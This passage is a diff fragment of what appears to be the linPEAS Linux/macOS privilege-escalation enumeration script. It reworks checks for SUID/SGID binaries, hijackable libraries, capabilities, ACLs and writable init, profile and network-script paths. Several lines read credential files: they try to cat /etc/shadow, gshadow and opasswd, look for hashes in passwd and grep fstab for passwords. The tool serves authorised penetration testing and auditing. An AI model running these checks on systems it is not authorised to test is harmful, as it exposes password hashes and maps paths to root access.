s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" fi fi fi fi - done; - echo "" + fi +done; +echo "" - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" fi fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" fi fi fi fi - done; - echo "" + fi +done; +echo "" - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi + fi +done +echo "" - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break fi done - echo "" + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi - ##-- IF) Users with capabilities + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" + +##-- IF) Users with capabilities +if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then print_2title "Users with capabilities" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" if [ -f "/etc/security/capability.conf" ]; then @@ -3402,332 +3637,331 @@ if echo $CHECKS | grep -q IntFiles; then else echo_not_found "/etc/security/capability.conf" fi echo "" +fi - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi done - echo "" +done +echo "" + +broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) +if [ "$broken_links" ] || [ "$DEBUG" ]; then print_2title "Broken links in path" echo $PATH | tr ":" "\n" | while read d; do find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; done echo "" +fi - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" +fi + +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" +fi - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo "" +fi - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or 